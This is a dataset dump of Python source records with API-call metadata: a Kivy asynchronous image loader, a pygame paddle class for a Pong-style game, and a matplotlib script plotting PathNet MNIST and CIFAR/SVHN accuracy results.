"research.gan.image_compression.data_provider.provide_data",
"tensorflow.variable_scope",
"tensorflow.contrib.training.SummaryAtEndHook",
"absl.app.run",
"tensorflow.image.encode_png",
"research.gan.image_compression.data_provider.float_image_to_uint8",
"tensorflow.summary.histogram",
"research.gan.image_compression.summaries.stack_images",
"tensorflow.name_scope",
"tensorflow.reduce_mean",
"tensorflow.summary.scalar",
"research.gan.image_compression.summaries.add_reconstruction_summaries",
"tensorflow.abs"
] | [((2633, 2707), 'research.gan.image_compression.summaries.add_reconstruction_summaries', 'summaries.add_reconstruction_summaries', (['images', 'reconstructions', 'prebinary'], {}), '(images, reconstructions, prebinary)\n', (2671, 2707), False, 'from research.gan.image_compression import summaries\n'), ((2853, 2891), 'tensorflow.reduce_mean', 'tf.reduce_mean', (['pixel_loss_per_example'], {}), '(pixel_loss_per_example)\n', (2867, 2891), True, 'import tensorflow as tf\n'), ((2896, 2962), 'tensorflow.summary.histogram', 'tf.summary.histogram', (['"""pixel_l1_loss_hist"""', 'pixel_loss_per_example'], {}), "('pixel_l1_loss_hist', pixel_loss_per_example)\n", (2916, 2962), True, 'import tensorflow as tf\n'), ((2967, 3013), 'tensorflow.summary.scalar', 'tf.summary.scalar', (['"""pixel_l1_loss"""', 'pixel_loss'], {}), "('pixel_l1_loss', pixel_loss)\n", (2984, 3013), True, 'import tensorflow as tf\n'), ((3076, 3118), 'research.gan.image_compression.data_provider.float_image_to_uint8', 'data_provider.float_image_to_uint8', (['images'], {}), '(images)\n', (3110, 3118), False, 'from research.gan.image_compression import data_provider\n'), ((3147, 3198), 'research.gan.image_compression.data_provider.float_image_to_uint8', 'data_provider.float_image_to_uint8', (['reconstructions'], {}), '(reconstructions)\n', (3181, 3198), False, 'from research.gan.image_compression import data_provider\n'), ((3220, 3279), 'research.gan.image_compression.summaries.stack_images', 'summaries.stack_images', (['uint8_images', 'uint8_reconstructions'], {}), '(uint8_images, uint8_reconstructions)\n', (3242, 3279), False, 'from research.gan.image_compression import summaries\n'), ((3872, 3882), 'absl.app.run', 'app.run', (['_'], {}), '(_)\n', (3879, 3882), False, 'from absl import app\n'), ((2109, 2132), 'tensorflow.name_scope', 'tf.name_scope', (['"""inputs"""'], {}), "('inputs')\n", (2122, 2132), True, 'import tensorflow as tf\n'), ((2151, 2274), 'research.gan.image_compression.data_provider.provide_data', 'data_provider.provide_data', (['"""validation"""', 'FLAGS.batch_size'], {'dataset_dir': 'FLAGS.dataset_dir', 'patch_size': 'FLAGS.patch_size'}), "('validation', FLAGS.batch_size, dataset_dir=\n FLAGS.dataset_dir, patch_size=FLAGS.patch_size)\n", (2177, 2274), False, 'from research.gan.image_compression import data_provider\n'), ((2398, 2428), 'tensorflow.variable_scope', 'tf.variable_scope', (['"""generator"""'], {}), "('generator')\n", (2415, 2428), True, 'import tensorflow as tf\n'), ((2470, 2584), 'research.gan.image_compression.networks.compression_model', 'networks.compression_model', (['images'], {'num_bits': 'FLAGS.bits_per_patch', 'depth': 'FLAGS.model_depth', 'is_training': '(False)'}), '(images, num_bits=FLAGS.bits_per_patch, depth=\n FLAGS.model_depth, is_training=False)\n', (2496, 2584), False, 'from research.gan.image_compression import networks\n'), ((2786, 2818), 'tensorflow.abs', 'tf.abs', (['(images - reconstructions)'], {}), '(images - reconstructions)\n', (2792, 2818), True, 'import tensorflow as tf\n'), ((3380, 3418), 'tensorflow.image.encode_png', 'tf.image.encode_png', (['uint8_reshaped[0]'], {}), '(uint8_reshaped[0])\n', (3399, 3418), True, 'import tensorflow as tf\n'), ((3624, 3676), 'tensorflow.contrib.training.SummaryAtEndHook', 'tf.contrib.training.SummaryAtEndHook', (['FLAGS.eval_dir'], {}), '(FLAGS.eval_dir)\n', (3660, 3676), True, 'import tensorflow as tf\n'), ((3693, 3735), 'tensorflow.contrib.training.StopAfterNEvalsHook', 'tf.contrib.training.StopAfterNEvalsHook', (['(1)'], {}), '(1)\n', (3732, 3735), True, 'import tensorflow as tf\n')] |
'''
Asynchronous data loader
========================
This is the Asynchronous Loader. You can use it to load an image
and use it, even if data are not yet available. You must specify a default
loading image for using a such loader::
from kivy import *
image = Loader.image('mysprite.png')
You can also load image from url::
image = Loader.image('http://mysite.com/test.png')
If you want to change the default loading image, you can do::
Loader.loading_image = Image('another_loading.png')
Tweaking the asynchronous loader
--------------------------------
.. versionadded:: 1.6.0
You can now tweak the loader to have a better user experience or more
performance, depending of the images you're gonna to load. Take a look at the
parameters:
- :data:`Loader.num_workers` - define the number of threads to start for
loading images
- :data:`Loader.max_upload_per_frame` - define the maximum image uploads in
GPU to do per frames.
'''
__all__ = ('Loader', 'LoaderBase', 'ProxyImage')
from kivy import kivy_data_dir
from kivy.logger import Logger
from kivy.clock import Clock
from kivy.cache import Cache
from kivy.core.image import ImageLoader, Image
from kivy.compat import PY2
from collections import deque
from time import sleep
from os.path import join
from os import write, close, unlink, environ
import threading
# Register a cache for loader
Cache.register('kv.loader', limit=500, timeout=60)
class ProxyImage(Image):
'''Image returned by the Loader.image() function.
:Properties:
`loaded`: bool, default to False
It can be True if the image is already cached
:Events:
`on_load`
Fired when the image is loaded and changed
'''
__events__ = ('on_load', )
def __init__(self, arg, **kwargs):
kwargs.setdefault('loaded', False)
super(ProxyImage, self).__init__(arg, **kwargs)
self.loaded = kwargs.get('loaded')
def on_load(self):
pass
class LoaderBase(object):
'''Common base for Loader and specific implementation.
By default, Loader will be the best available loader implementation.
The _update() function is called every 1 / 25.s or each frame if we have
less than 25 FPS.
'''
def __init__(self):
self._loading_image = None
self._error_image = None
self._num_workers = 2
self._max_upload_per_frame = 2
self._paused = False
self._resume_cond = threading.Condition()
self._q_load = deque()
self._q_done = deque()
self._client = []
self._running = False
self._start_wanted = False
self._trigger_update = Clock.create_trigger(self._update)
def __del__(self):
try:
Clock.unschedule(self._update)
except Exception:
pass
def _set_num_workers(self, num):
if num < 2:
raise Exception('Must have at least 2 workers')
self._num_workers = num
def _get_num_workers(self):
return self._num_workers
num_workers = property(_get_num_workers, _set_num_workers)
'''Number of workers to use while loading. (used only if the loader
implementation support it.). This setting impact the loader only at the
beginning. Once the loader is started, the setting has no impact::
from kivy.loader import Loader
Loader.num_workers = 4
The default value is 2 for giving a smooth user experience. You could
increase the number of workers, then all the images will be loaded faster,
but the user will not been able to use the application while loading.
Prior to 1.6.0, the default number was 20, and loading many full-hd images
was blocking completly the application.
.. versionadded:: 1.6.0
'''
def _set_max_upload_per_frame(self, num):
if num is not None and num < 1:
raise Exception('Must have at least 1 image processing per image')
self._max_upload_per_frame = num
def _get_max_upload_per_frame(self):
return self._max_upload_per_frame
max_upload_per_frame = property(_get_max_upload_per_frame,
_set_max_upload_per_frame)
'''Number of image to upload per frame. By default, we'll upload only 2
images in the GPU per frame. If you are uploading many tiny images, you can
easily increase this parameter to 10, or more.
If you are loading multiples Full-HD images, the upload time can be
consequent, and can stuck the application during the upload. If you want a
smooth experience, let the default.
As matter of fact, a Full-HD RGB image will take ~6MB in memory, so it will
take times. If you have activated mipmap=True too, then the GPU must
calculate the mipmap of this big images too, in real time. Then it can be
smart to reduce the :data:`max_upload_per_frame` to 1 or 2. If you get ride
of that (or reduce it a lot), take a look at the DDS format.
.. versionadded:: 1.6.0
'''
def _get_loading_image(self):
if not self._loading_image:
loading_png_fn = join(kivy_data_dir, 'images', 'image-loading.gif')
self._loading_image = ImageLoader.load(filename=loading_png_fn)
return self._loading_image
def _set_loading_image(self, image):
if isinstance(image, basestring):
self._loading_image = ImageLoader.load(filename=image)
else:
self._loading_image = image
loading_image = property(_get_loading_image, _set_loading_image)
'''Image used for loading.
You can change it by doing::
Loader.loading_image = 'loading.png'
.. versionchanged:: 1.6.0
Not readonly anymore.
'''
def _get_error_image(self):
if not self._error_image:
error_png_fn = join(
'atlas://data/images/defaulttheme/image-missing')
self._error_image = ImageLoader.load(filename=error_png_fn)
return self._error_image
def _set_error_image(self, image):
if isinstance(image, basestring):
self._error_image = ImageLoader.load(filename=image)
else:
self._error_image = image
error_image = property(_get_error_image, _set_error_image)
'''Image used for error.
You can change it by doing::
Loader.error_image = 'error.png'
.. versionchanged:: 1.6.0
Not readonly anymore.
'''
def start(self):
'''Start the loader thread/process'''
self._running = True
def run(self, *largs):
'''Main loop for the loader.'''
pass
def stop(self):
'''Stop the loader thread/process'''
self._running = False
def pause(self):
'''Pause the loader, can be useful during interactions
.. versionadded:: 1.6.0
'''
self._paused = True
def resume(self):
'''Resume the loader, after a :meth:`pause`.
.. versionadded:: 1.6.0
'''
self._paused = False
self._resume_cond.acquire()
self._resume_cond.notify_all()
self._resume_cond.release()
def _wait_for_resume(self):
while self._running and self._paused:
self._resume_cond.acquire()
self._resume_cond.wait(0.25)
self._resume_cond.release()
def _load(self, kwargs):
'''(internal) Loading function, called by the thread.
Will call _load_local() if the file is local,
or _load_urllib() if the file is on Internet
'''
while len(self._q_done) >= (
self.max_upload_per_frame * self._num_workers):
sleep(0.1)
self._wait_for_resume()
filename = kwargs['filename']
load_callback = kwargs['load_callback']
post_callback = kwargs['post_callback']
try:
proto = filename.split(':', 1)[0]
except:
#if blank filename then return
return
if load_callback is not None:
data = load_callback(filename)
elif proto in ('http', 'https', 'ftp', 'smb'):
data = self._load_urllib(filename, kwargs['kwargs'])
else:
data = self._load_local(filename, kwargs['kwargs'])
if post_callback:
data = post_callback(data)
self._q_done.appendleft((filename, data))
self._trigger_update()
def _load_local(self, filename, kwargs):
'''(internal) Loading a local file'''
# With recent changes to CoreImage, we must keep data otherwise,
# we might be unable to recreate the texture afterwise.
return ImageLoader.load(filename, keep_data=True, **kwargs)
def _load_urllib(self, filename, kwargs):
'''(internal) Loading a network file. First download it, save it to a
temporary file, and pass it to _load_local()'''
if PY2:
import urllib2 as urllib_request
else:
import urllib.request as urllib_request
proto = filename.split(':', 1)[0]
if proto == 'smb':
try:
# note: it's important to load SMBHandler every time
# otherwise the data is occasionaly not loaded
from smb.SMBHandler import SMBHandler
except ImportError:
Logger.warning(
'Loader: can not load PySMB: make sure it is installed')
return
import tempfile
data = fd = _out_osfd = None
try:
_out_filename = ''
suffix = '.%s' % (filename.split('.')[-1])
_out_osfd, _out_filename = tempfile.mkstemp(
prefix='kivyloader', suffix=suffix)
if proto == 'smb':
# read from samba shares
fd = urllib_request.build_opener(SMBHandler).open(filename)
else:
# read from internet
fd = urllib_request.urlopen(filename)
idata = fd.read()
fd.close()
fd = None
# write to local filename
write(_out_osfd, idata)
close(_out_osfd)
_out_osfd = None
# load data
data = self._load_local(_out_filename, kwargs)
# FIXME create a clean API for that
for imdata in data._data:
imdata.source = filename
except Exception:
Logger.exception('Failed to load image <%s>' % filename)
# close file when remote file not found or download error
try:
close(_out_osfd)
except OSError:
pass
return self.error_image
finally:
if fd:
fd.close()
if _out_osfd:
close(_out_osfd)
if _out_filename != '':
unlink(_out_filename)
return data
def _update(self, *largs):
'''(internal) Check if a data is loaded, and pass to the client'''
# want to start it ?
if self._start_wanted:
if not self._running:
self.start()
self._start_wanted = False
# in pause mode, don't unqueue anything.
if self._paused:
self._trigger_update()
return
for x in range(self.max_upload_per_frame):
try:
filename, data = self._q_done.pop()
except IndexError:
return
# create the image
image = data # ProxyImage(data)
if not image.nocache:
Cache.append('kv.loader', filename, image)
# update client
for c_filename, client in self._client[:]:
if filename != c_filename:
continue
# got one client to update
client.image = image
client.loaded = True
client.dispatch('on_load')
self._client.remove((c_filename, client))
self._trigger_update()
def image(self, filename, load_callback=None, post_callback=None, **kwargs):
'''Load a image using the Loader. A ProxyImage is returned with a
loading image. You can use it as follows::
from kivy.app import App
from kivy.uix.image import Image
from kivy.loader import Loader
class TestApp(App):
def _image_loaded(self, proxyImage):
if proxyImage.image.texture:
self.image.texture = proxyImage.image.texture
def build(self):
proxyImage = Loader.image("myPic.jpg")
proxyImage.bind(on_load=self._image_loaded)
self.image = Image()
return self.image
TestApp().run()
In order to cancel all background loading, call *Loader.stop()*.
'''
data = Cache.get('kv.loader', filename)
if data not in (None, False):
# found image, if data is not here, need to reload.
return ProxyImage(data,
loading_image=self.loading_image,
loaded=True, **kwargs)
client = ProxyImage(self.loading_image,
loading_image=self.loading_image, **kwargs)
self._client.append((filename, client))
if data is None:
# if data is None, this is really the first time
self._q_load.appendleft({
'filename': filename,
'load_callback': load_callback,
'post_callback': post_callback,
'kwargs': kwargs})
if not kwargs.get('nocache', False):
Cache.append('kv.loader', filename, False)
self._start_wanted = True
self._trigger_update()
else:
# already queued for loading
pass
return client
#
# Loader implementation
#
if 'KIVY_DOC' in environ:
Loader = None
else:
#
# Try to use pygame as our first choice for loader
#
from kivy.compat import queue
from threading import Thread
class _Worker(Thread):
'''Thread executing tasks from a given tasks queue
'''
def __init__(self, pool, tasks):
Thread.__init__(self)
self.tasks = tasks
self.daemon = True
self.pool = pool
self.start()
def run(self):
while self.pool.running:
func, args, kargs = self.tasks.get()
try:
func(*args, **kargs)
except Exception as e:
print(e)
self.tasks.task_done()
class _ThreadPool(object):
'''Pool of threads consuming tasks from a queue
'''
def __init__(self, num_threads):
super(_ThreadPool, self).__init__()
self.running = True
self.tasks = queue.Queue()
for _ in range(num_threads):
_Worker(self, self.tasks)
def add_task(self, func, *args, **kargs):
'''Add a task to the queue
'''
self.tasks.put((func, args, kargs))
def stop(self):
self.running = False
self.tasks.join()
class LoaderThreadPool(LoaderBase):
def __init__(self):
super(LoaderThreadPool, self).__init__()
self.pool = None
def start(self):
super(LoaderThreadPool, self).start()
self.pool = _ThreadPool(self._num_workers)
Clock.schedule_interval(self.run, 0)
def stop(self):
super(LoaderThreadPool, self).stop()
Clock.unschedule(self.run)
self.pool.stop()
def run(self, *largs):
while self._running:
try:
parameters = self._q_load.pop()
except:
return
self.pool.add_task(self._load, parameters)
Loader = LoaderThreadPool()
Logger.info('Loader: using a thread pool of {} workers'.format(
Loader.num_workers))
| [
"time.sleep",
"threading.Thread.__init__",
"collections.deque",
"kivy.cache.Cache.register",
"kivy.logger.Logger.exception",
"kivy.cache.Cache.append",
"os.unlink",
"urllib.request.build_opener",
"threading.Condition",
"urllib.request.urlopen",
"os.close",
"os.write",
"kivy.compat.queue.Queue",
"kivy.core.image.ImageLoader.load",
"kivy.clock.Clock.unschedule",
"tempfile.mkstemp",
"os.path.join",
"kivy.logger.Logger.warning",
"kivy.cache.Cache.get",
"kivy.clock.Clock.schedule_interval",
"kivy.clock.Clock.create_trigger"
] | [((1379, 1429), 'kivy.cache.Cache.register', 'Cache.register', (['"""kv.loader"""'], {'limit': '(500)', 'timeout': '(60)'}), "('kv.loader', limit=500, timeout=60)\n", (1393, 1429), False, 'from kivy.cache import Cache\n'), ((2461, 2482), 'threading.Condition', 'threading.Condition', ([], {}), '()\n', (2480, 2482), False, 'import threading\n'), ((2507, 2514), 'collections.deque', 'deque', ([], {}), '()\n', (2512, 2514), False, 'from collections import deque\n'), ((2538, 2545), 'collections.deque', 'deque', ([], {}), '()\n', (2543, 2545), False, 'from collections import deque\n'), ((2668, 2702), 'kivy.clock.Clock.create_trigger', 'Clock.create_trigger', (['self._update'], {}), '(self._update)\n', (2688, 2702), False, 'from kivy.clock import Clock\n'), ((8614, 8666), 'kivy.core.image.ImageLoader.load', 'ImageLoader.load', (['filename'], {'keep_data': '(True)'}), '(filename, keep_data=True, **kwargs)\n', (8630, 8666), False, 'from kivy.core.image import ImageLoader, Image\n'), ((12932, 12964), 'kivy.cache.Cache.get', 'Cache.get', (['"""kv.loader"""', 'filename'], {}), "('kv.loader', filename)\n", (12941, 12964), False, 'from kivy.cache import Cache\n'), ((2752, 2782), 'kivy.clock.Clock.unschedule', 'Clock.unschedule', (['self._update'], {}), '(self._update)\n', (2768, 2782), False, 'from kivy.clock import Clock\n'), ((5090, 5140), 'os.path.join', 'join', (['kivy_data_dir', '"""images"""', '"""image-loading.gif"""'], {}), "(kivy_data_dir, 'images', 'image-loading.gif')\n", (5094, 5140), False, 'from os.path import join\n'), ((5175, 5216), 'kivy.core.image.ImageLoader.load', 'ImageLoader.load', ([], {'filename': 'loading_png_fn'}), '(filename=loading_png_fn)\n', (5191, 5216), False, 'from kivy.core.image import ImageLoader, Image\n'), ((5370, 5402), 'kivy.core.image.ImageLoader.load', 'ImageLoader.load', ([], {'filename': 'image'}), '(filename=image)\n', (5386, 5402), False, 'from kivy.core.image import ImageLoader, Image\n'), ((5800, 5854), 'os.path.join', 'join', (['"""atlas://data/images/defaulttheme/image-missing"""'], {}), "('atlas://data/images/defaulttheme/image-missing')\n", (5804, 5854), False, 'from os.path import join\n'), ((5904, 5943), 'kivy.core.image.ImageLoader.load', 'ImageLoader.load', ([], {'filename': 'error_png_fn'}), '(filename=error_png_fn)\n', (5920, 5943), False, 'from kivy.core.image import ImageLoader, Image\n'), ((6091, 6123), 'kivy.core.image.ImageLoader.load', 'ImageLoader.load', ([], {'filename': 'image'}), '(filename=image)\n', (6107, 6123), False, 'from kivy.core.image import ImageLoader, Image\n'), ((7627, 7637), 'time.sleep', 'sleep', (['(0.1)'], {}), '(0.1)\n', (7632, 7637), False, 'from time import sleep\n'), ((9610, 9662), 'tempfile.mkstemp', 'tempfile.mkstemp', ([], {'prefix': '"""kivyloader"""', 'suffix': 'suffix'}), "(prefix='kivyloader', suffix=suffix)\n", (9626, 9662), False, 'import tempfile\n'), ((10068, 10091), 'os.write', 'write', (['_out_osfd', 'idata'], {}), '(_out_osfd, idata)\n', (10073, 10091), False, 'from os import write, close, unlink, environ\n'), ((10104, 10120), 'os.close', 'close', (['_out_osfd'], {}), '(_out_osfd)\n', (10109, 10120), False, 'from os import write, close, unlink, environ\n'), ((14301, 14322), 'threading.Thread.__init__', 'Thread.__init__', (['self'], {}), '(self)\n', (14316, 14322), False, 'from threading import Thread\n'), ((14968, 14981), 'kivy.compat.queue.Queue', 'queue.Queue', ([], {}), '()\n', (14979, 14981), False, 'from kivy.compat import queue\n'), ((15601, 15637), 'kivy.clock.Clock.schedule_interval', 'Clock.schedule_interval', (['self.run', '(0)'], {}), '(self.run, 0)\n', (15624, 15637), False, 'from kivy.clock import Clock\n'), ((15724, 15750), 'kivy.clock.Clock.unschedule', 'Clock.unschedule', (['self.run'], {}), '(self.run)\n', (15740, 15750), False, 'from kivy.clock import Clock\n'), ((9909, 9941), 'urllib.request.urlopen', 'urllib_request.urlopen', (['filename'], {}), '(filename)\n', (9931, 9941), True, 'import urllib.request as urllib_request\n'), ((10400, 10456), 'kivy.logger.Logger.exception', 'Logger.exception', (["('Failed to load image <%s>' % filename)"], {}), "('Failed to load image <%s>' % filename)\n", (10416, 10456), False, 'from kivy.logger import Logger\n'), ((10767, 10783), 'os.close', 'close', (['_out_osfd'], {}), '(_out_osfd)\n', (10772, 10783), False, 'from os import write, close, unlink, environ\n'), ((10836, 10857), 'os.unlink', 'unlink', (['_out_filename'], {}), '(_out_filename)\n', (10842, 10857), False, 'from os import write, close, unlink, environ\n'), ((11579, 11621), 'kivy.cache.Cache.append', 'Cache.append', (['"""kv.loader"""', 'filename', 'image'], {}), "('kv.loader', filename, image)\n", (11591, 11621), False, 'from kivy.cache import Cache\n'), ((13720, 13762), 'kivy.cache.Cache.append', 'Cache.append', (['"""kv.loader"""', 'filename', '(False)'], {}), "('kv.loader', filename, False)\n", (13732, 13762), False, 'from kivy.cache import Cache\n'), ((9295, 9366), 'kivy.logger.Logger.warning', 'Logger.warning', (['"""Loader: can not load PySMB: make sure it is installed"""'], {}), "('Loader: can not load PySMB: make sure it is installed')\n", (9309, 9366), False, 'from kivy.logger import Logger\n'), ((10560, 10576), 'os.close', 'close', (['_out_osfd'], {}), '(_out_osfd)\n', (10565, 10576), False, 'from os import write, close, unlink, environ\n'), ((9778, 9817), 'urllib.request.build_opener', 'urllib_request.build_opener', (['SMBHandler'], {}), '(SMBHandler)\n', (9805, 9817), True, 'import urllib.request as urllib_request\n')] |
import os
os.environ["PYGAME_HIDE_SUPPORT_PROMPT"] = "hide"
import pygame
RENDER_RATIO = 2
class CakePaddle(pygame.sprite.Sprite):
def __init__(self, speed=12):
# surf is the right-most (largest) tier of the cake
self.surf = pygame.Surface((30 // RENDER_RATIO, 120 // RENDER_RATIO))
self.rect = self.surf.get_rect()
self.surf2 = pygame.Surface((30 // RENDER_RATIO, 80 // RENDER_RATIO))
self.rect2 = self.surf2.get_rect()
self.surf3 = pygame.Surface((30 // RENDER_RATIO, 40 // RENDER_RATIO))
self.rect3 = self.surf3.get_rect()
self.surf4 = pygame.Surface((30 // RENDER_RATIO, 10 // RENDER_RATIO))
self.rect4 = self.surf4.get_rect()
self.speed = speed
def reset(self):
# self.rect is set from envs class
self.rect2.midright = self.rect.midleft
self.rect3.midright = self.rect2.midleft
self.rect4.midright = self.rect3.midleft
def draw(self, screen):
pygame.draw.rect(screen, (255, 255, 255), self.rect)
pygame.draw.rect(screen, (255, 255, 255), self.rect2)
pygame.draw.rect(screen, (255, 255, 255), self.rect3)
pygame.draw.rect(screen, (255, 255, 255), self.rect4)
def update(self, area, action):
# action: 1 - up, 2 - down
movepos = [0, 0]
if action == 1:
movepos[1] = movepos[1] - self.speed
elif action == 2:
movepos[1] = movepos[1] + self.speed
newpos = self.rect.move(movepos)
if area.contains(newpos):
self.rect = newpos
# move other rects too
self.rect2 = self.rect2.move(movepos)
self.rect3 = self.rect3.move(movepos)
self.rect4 = self.rect4.move(movepos)
def process_collision(self, b_rect, dx, dy, b_speed, paddle_type):
"""
Parameters
----------
b_rect : Ball rect
dx, dy : Ball speed along single axis
b_speed : Ball speed
ignore paddle type
Returns
-------
is_collision: 1 if ball collides with paddle
b_rect: new ball rect
b_speed: new ball speed
"""
if self.rect4.colliderect(b_rect):
is_collision = True
if dx > 0:
b_rect.right = self.rect4.left
b_speed[0] = -b_speed[0]
# top or bottom edge
elif dy > 0:
b_rect.bottom = self.rect4.top
b_speed[1] = -b_speed[1]
elif dy < 0:
b_rect.top = self.rect4.bottom
b_speed[1] = -b_speed[1]
return is_collision, b_rect, b_speed
elif self.rect3.colliderect(b_rect):
is_collision = True
if dx > 0:
b_rect.right = self.rect3.left
b_speed[0] = -b_speed[0]
# top or bottom edge
elif dy > 0:
b_rect.bottom = self.rect3.top
b_speed[1] = -b_speed[1]
elif dy < 0:
b_rect.top = self.rect3.bottom
b_speed[1] = -b_speed[1]
return is_collision, b_rect, b_speed
elif self.rect2.colliderect(b_rect):
is_collision = True
if dx > 0:
b_rect.right = self.rect2.left
b_speed[0] = -b_speed[0]
# top or bottom edge
elif dy > 0:
b_rect.bottom = self.rect2.top
b_speed[1] = -b_speed[1]
elif dy < 0:
b_rect.top = self.rect2.bottom
b_speed[1] = -b_speed[1]
return is_collision, b_rect, b_speed
elif self.rect.colliderect(b_rect):
is_collision = True
if dx > 0:
b_rect.right = self.rect.left
b_speed[0] = -b_speed[0]
# top or bottom edge
elif dy > 0:
b_rect.bottom = self.rect.top
b_speed[1] = -b_speed[1]
elif dy < 0:
b_rect.top = self.rect.bottom
b_speed[1] = -b_speed[1]
return is_collision, b_rect, b_speed
return False, b_rect, b_speed
| [
"pygame.draw.rect",
"pygame.Surface"
] | [((249, 306), 'pygame.Surface', 'pygame.Surface', (['(30 // RENDER_RATIO, 120 // RENDER_RATIO)'], {}), '((30 // RENDER_RATIO, 120 // RENDER_RATIO))\n', (263, 306), False, 'import pygame\n'), ((369, 425), 'pygame.Surface', 'pygame.Surface', (['(30 // RENDER_RATIO, 80 // RENDER_RATIO)'], {}), '((30 // RENDER_RATIO, 80 // RENDER_RATIO))\n', (383, 425), False, 'import pygame\n'), ((490, 546), 'pygame.Surface', 'pygame.Surface', (['(30 // RENDER_RATIO, 40 // RENDER_RATIO)'], {}), '((30 // RENDER_RATIO, 40 // RENDER_RATIO))\n', (504, 546), False, 'import pygame\n'), ((611, 667), 'pygame.Surface', 'pygame.Surface', (['(30 // RENDER_RATIO, 10 // RENDER_RATIO)'], {}), '((30 // RENDER_RATIO, 10 // RENDER_RATIO))\n', (625, 667), False, 'import pygame\n'), ((987, 1039), 'pygame.draw.rect', 'pygame.draw.rect', (['screen', '(255, 255, 255)', 'self.rect'], {}), '(screen, (255, 255, 255), self.rect)\n', (1003, 1039), False, 'import pygame\n'), ((1048, 1101), 'pygame.draw.rect', 'pygame.draw.rect', (['screen', '(255, 255, 255)', 'self.rect2'], {}), '(screen, (255, 255, 255), self.rect2)\n', (1064, 1101), False, 'import pygame\n'), ((1110, 1163), 'pygame.draw.rect', 'pygame.draw.rect', (['screen', '(255, 255, 255)', 'self.rect3'], {}), '(screen, (255, 255, 255), self.rect3)\n', (1126, 1163), False, 'import pygame\n'), ((1172, 1225), 'pygame.draw.rect', 'pygame.draw.rect', (['screen', '(255, 255, 255)', 'self.rect4'], {}), '(screen, (255, 255, 255), self.rect4)\n', (1188, 1225), False, 'import pygame\n')] |
import argparse
import os
import pickle
import numpy as np
import matplotlib.pyplot as plt
plt.style.use('ggplot')
parser = argparse.ArgumentParser(description='PyTorch MNIST Example')
parser.add_argument('--mnist', action='store_true', default=False,
help='open mnist result')
args = parser.parse_args()
def subplot(subplot, data_first, data_second, title):
plt.subplot(subplot)
if args.mnist:
x = np.arange(0,100)
else:
x = np.arange(0,500)
y_first = np.mean(data_first, axis=0)
y_second = np.mean(data_second, axis=0)
y_first_err = np.std(data_first, axis=0) / 2.
y_second_err = np.std(data_second, axis=0) / 2.
plt.fill_between(x, y_first - y_first_err, y_first + y_first_err, color='m', alpha=0.3)
plt.fill_between(x, y_second - y_second_err, y_second + y_second_err, color='c', alpha=0.3)
plt.plot(x, y_first, color='r', label='Task A')
plt.plot(x, y_second, color='g', label='Task B (transfer learning)')
plt.legend(bbox_to_anchor=(0.8, 0.3), loc=2, ncol=1, fontsize=15)
axes = plt.gca()
if args.mnist:
axes.set_xlim([0, 100])
axes.set_ylim([0, 1.2])
else:
axes.set_xlim([0, 500])
axes.set_ylim([0, 0.6])
plt.title(title, fontsize=20, y = 0.9)
plt.ylabel('Accuracy',fontsize=15)
plt.xlabel('Generations',fontsize=15)
plt.grid(True)
try:
if args.mnist:
f = open(os.path.join('./result/result_mnist.pickle'))
result = pickle.load(f)
f.close()
pathnet_first = []
pathnet_second = []
for res in result:
pathnet_first.append(res[2])
pathnet_second.append(res[3])
subplot('111', pathnet_first, pathnet_second,'MNIST')
plt.show()
else:
f = open(os.path.join('./result/result_cifar_svhn.pickle'))
result = pickle.load(f)
f.close()
cifar_first = []
cifar_second = []
svhn_first = []
svhn_second = []
for res in result:
if res[0] == 'pathnet_cifar_first':
cifar_first.append(res[2])
svhn_second.append(res[3])
else:
svhn_first.append(res[2])
cifar_second.append(res[3])
subplot('211', cifar_first, cifar_second,'CIFAR-10')
subplot('212', svhn_first, svhn_second,'cSVHN')
plt.show()
except IOError:
print("Result file does not exist")
| [
"numpy.mean",
"matplotlib.pyplot.grid",
"argparse.ArgumentParser",
"matplotlib.pyplot.ylabel",
"numpy.arange",
"matplotlib.pyplot.gca",
"matplotlib.pyplot.xlabel",
"matplotlib.pyplot.plot",
"pickle.load",
"matplotlib.pyplot.style.use",
"os.path.join",
"matplotlib.pyplot.fill_between",
"numpy.std",
"matplotlib.pyplot.title",
"matplotlib.pyplot.subplot",
"matplotlib.pyplot.legend",
"matplotlib.pyplot.show"
] | [((91, 114), 'matplotlib.pyplot.style.use', 'plt.style.use', (['"""ggplot"""'], {}), "('ggplot')\n", (104, 114), True, 'import matplotlib.pyplot as plt\n'), ((125, 185), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""PyTorch MNIST Example"""'}), "(description='PyTorch MNIST Example')\n", (148, 185), False, 'import argparse\n'), ((386, 406), 'matplotlib.pyplot.subplot', 'plt.subplot', (['subplot'], {}), '(subplot)\n', (397, 406), True, 'import matplotlib.pyplot as plt\n'), ((508, 535), 'numpy.mean', 'np.mean', (['data_first'], {'axis': '(0)'}), '(data_first, axis=0)\n', (515, 535), True, 'import numpy as np\n'), ((551, 579), 'numpy.mean', 'np.mean', (['data_second'], {'axis': '(0)'}), '(data_second, axis=0)\n', (558, 579), True, 'import numpy as np\n'), ((692, 783), 'matplotlib.pyplot.fill_between', 'plt.fill_between', (['x', '(y_first - y_first_err)', '(y_first + y_first_err)'], {'color': '"""m"""', 'alpha': '(0.3)'}), "(x, y_first - y_first_err, y_first + y_first_err, color='m',\n alpha=0.3)\n", (708, 783), True, 'import matplotlib.pyplot as plt\n'), ((784, 880), 'matplotlib.pyplot.fill_between', 'plt.fill_between', (['x', '(y_second - y_second_err)', '(y_second + y_second_err)'], {'color': '"""c"""', 'alpha': '(0.3)'}), "(x, y_second - y_second_err, y_second + y_second_err, color\n ='c', alpha=0.3)\n", (800, 880), True, 'import matplotlib.pyplot as plt\n'), ((880, 927), 'matplotlib.pyplot.plot', 'plt.plot', (['x', 'y_first'], {'color': '"""r"""', 'label': '"""Task A"""'}), "(x, y_first, color='r', label='Task A')\n", (888, 927), True, 'import matplotlib.pyplot as plt\n'), ((932, 1000), 'matplotlib.pyplot.plot', 'plt.plot', (['x', 'y_second'], {'color': '"""g"""', 'label': '"""Task B (transfer learning)"""'}), "(x, y_second, color='g', label='Task B (transfer learning)')\n", (940, 1000), True, 'import matplotlib.pyplot as plt\n'), ((1005, 1070), 'matplotlib.pyplot.legend', 'plt.legend', ([], {'bbox_to_anchor': '(0.8, 0.3)', 'loc': '(2)', 'ncol': '(1)', 'fontsize': '(15)'}), '(bbox_to_anchor=(0.8, 0.3), loc=2, ncol=1, fontsize=15)\n', (1015, 1070), True, 'import matplotlib.pyplot as plt\n'), ((1082, 1091), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (1089, 1091), True, 'import matplotlib.pyplot as plt\n'), ((1254, 1290), 'matplotlib.pyplot.title', 'plt.title', 